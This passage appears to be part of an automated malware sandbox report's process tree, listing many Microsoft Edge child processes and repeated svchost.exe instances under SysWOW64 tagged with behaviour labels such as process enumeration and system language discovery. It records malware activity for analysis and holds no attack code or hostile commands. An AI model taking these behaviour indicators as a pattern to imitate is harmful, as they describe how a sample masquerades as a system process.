        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
        7⤵
        
        PID:5344
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:1
        7⤵
        
        PID:5592
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
        7⤵
        
        PID:6064
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:1
        7⤵
        
        PID:4952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6228 /prefetch:1
        7⤵
        
        PID:5148
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:1
        7⤵
        
        PID:1848
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6352 /prefetch:1
        7⤵
        
        PID:3396
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
        7⤵
        
        PID:6008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
        7⤵
        
        PID:5244
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
        7⤵
        
        PID:5920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6408 /prefetch:1
        7⤵
        
        PID:1808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6828 /prefetch:1
        7⤵
        
        PID:4708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
        7⤵
        
        PID:5536
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6980 /prefetch:1
        7⤵
        
        PID:920
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6248 /prefetch:1
        7⤵
        
        PID:4628
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7184 /prefetch:1
        7⤵
        
        PID:6008
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
        7⤵
        
        PID:5744
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
        7⤵
        
        PID:3716
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7224 /prefetch:1
        7⤵
        
        PID:3152
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7680 /prefetch:1
        7⤵
        
        PID:6168
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6376 /prefetch:2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:6604
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7440 /prefetch:1
        7⤵
        
        PID:6952
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7396 /prefetch:1
        7⤵
        
        PID:6996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2204,10361080601399073820,4050254118612277056,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8028 /prefetch:1
        7⤵
        
        PID:6388
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3700
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:5056
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4568
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5708
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:5720
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2572
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xdc,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:1616
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5284
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5204
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:5216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5032
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:1560
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5308
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2444
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:2752
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5580
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:4080
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3112
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:2996
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xfc,0x10c,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:4544
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:5972
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:3136
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:536
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6088
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xe4,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:5548
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:4000
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x74,0x78,0x7c,0xe8,0x80,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:5968
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2504
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:2092
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:6836
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffd79846f8,0x7fffd7984708,0x7fffd7984718
        7⤵
        
        PID:6856
    - - C:\Windows\SysWOW64\svchost.exe
        
        svchost.exe
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:6896
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
        6⤵
        
        PID:3900
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
